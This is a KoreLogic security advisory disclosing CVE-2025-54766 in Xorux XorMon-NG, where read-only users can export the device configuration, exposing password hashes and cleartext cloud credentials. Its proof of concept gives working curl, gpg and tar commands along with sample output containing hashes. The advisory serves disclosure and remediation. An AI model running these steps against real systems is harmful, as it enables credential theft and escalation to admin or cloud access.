Skip to main content
Security Advisory

Xorux XorMon-NG Read Only User Export Device Configuration Exposing Sensitive Information

Advisory ID
KL-001-2025-012
CVE ID
CVE-2025-54766
Published
2025-07-28
Vendor
Xorux

Affected Systems

Product
XorMon-NG
Version
1.8 and prior
Platform
Debian

Discovered By

Jim Becher (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Xorux
Affected Product: XorMon-NG
Affected Version: 1.8 and prior
Platform: Debian
CWE Classification: CWE-648: Incorrect Use of Privileged APIs
CVE ID: CVE-2025-54766

Vulnerability Description

An API endpoint that should be limited to web application administrators is hidden from, but accessible by, lower-level read only web application users. The endpoint can be used to export the appliance configuration, exposing sensitive information.

Technical Description

A read-only user can access a web application endpoint by which device exports can be downloaded. The device exports are in tar.gz.gpg format, and can be extracted to reveal sensitive information that a read-only user should not be privileged to view. The GPG decryption uses a default of “undefined” for symmetric encryption and decryption. These files include password hashes for all users within the Xormon-NG web application and cloud credentials in clear text. An authenticated, read-only attacker could leverage this vulnerability to obtain and attempt to crack password hashes for more privileged users, including the admin user. An attacker could also leverage this vulnerability to gain access to cloud infrastructure.

Mitigation and Remediation Recommendation

Xorux released version 1.9.38, which includes a remediation for this vulnerability. See https://xormon.com/note190.php.

Credit

This vulnerability was discovered by Jim Becher of KoreLogic, Inc.

Proof of Concept

    $ curl -k -H "Content-Type: application/json" -H "Cookie: connect.sid=s%3AqF6R6oacG-octtP9NlJkYh7KqkVWF6on.pTnLbzxDG7MjijzVV%2FbFbPGv7dP%2FZkdQpEco456VZb0" 'https://172.31.255.208/api/confporter/v1/export' -X POST -d '{"keys":["hostcfg","users","groups","ldaps"],"password":"undefined"}' -o configuration061025-check-aws.tar.gz.gpg

    $ gpg --output configuration061025-check-aws.tar.gz --decrypt configuration061025-check-aws.tar.gz.gpg
    gpg: AES256.CFB encrypted data
    gpg: encrypted with 1 passphrase

    $ gunzip configuration061025-check-aws.tar.gz

    $ tar xvf configuration061025-check-aws.tar
    confporter/
    confporter/admin_groups.csv
    confporter/group_ldap_groups.csv
    confporter/groups.csv
    confporter/hostcfg.csv
    confporter/ldap_groups.csv
    confporter/ldaps.csv
    confporter/package.json
    confporter/users.csv
    confporter/users_groups.csv
    confporter/versions.csv

    $ more confporter/hostcfg.csv
    hostcfg_id;label;hw_type;disabled;target;ignore_health_status;ignore_health_status_reason;data;createdAt;updatedAt
    dc4547c2-1dc8-4ec1-a29e-29c36169e55f;testaws;aws;false;false;true;ccccc;{"host":"aws.amazon.com","port":null,"created":1749563055535,"regions":[""],"updated":null,"disabled":false,"interval":300,"description":"testaws","available_regions":[""],"aws_access_key_id":"AAAAAAAAAAAAAAAAA","aws_secret_access_key":"BBBBBBBBBBBBBBBBBBBBBBBBBBBBB"};2025-06-10T13:44:15.891Z;2025-06-10T13:44:15.891Z;

    $ more confporter/users.csv
    user_id;username;email;password;active;locked;failed_login_attempts;readonly;ldap_id;timezone;created;updated;logged;configuration
    1;xormon;;$2b$10$GTliGfYOL7cUmvLpd6qTB.6x8UNTymyHrvLTncLoBmM/7Y5p4WsXi;true;false;0;false;;Etc/UTC;2025-06-09T20:27:52.040Z;2025-06-09T20:28:28.077Z;2025-06-09T20:28:28.051Z;{"showReleaseNotes":true,"searchHistoryLimit":40};
    3;adman;adman@adman.com;$2a$10$MvdgLQO60xPZyRIU/rXCeucdZsy4LMyGXCW36IIbrWTmBXNFb5urW;true;false;0;false;;UTC;2025-06-09T20:29:11.811Z;2025-06-09T20:29:11.811Z;;{"searchHistoryLimit":40};
    2;jbecher;jbecher@korelogic.com;$2a$10$gfngoltRPRvd0epLQ7YHVOrBDp1MuSvVlxMoOivIC1HwHsXRN1VVK;true;false;0;false;;UTC;2025-06-09T20:28:55.801Z;2025-06-09T20:52:19.347Z;2025-06-09T20:52:19.346Z;{"searchHistoryLimit":40};

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

Disclosure Timeline

KoreLogic requests point-of-contact to securely report several vulnerabilities to Xorux.

Vendor provides support@xorux.com as the point-of-contact, noting that they do not use PGP.

KoreLogic submits this vulnerability and four additional discoveries to Xorux.

Vendor acknowledges receipt, stating that the issue has been remediated and a new version of the affected product will be available 2025-07-25.

Xorux publishes updated version of the affected product.

KoreLogic public disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Contact Security Team
All Advisories Download signed .txt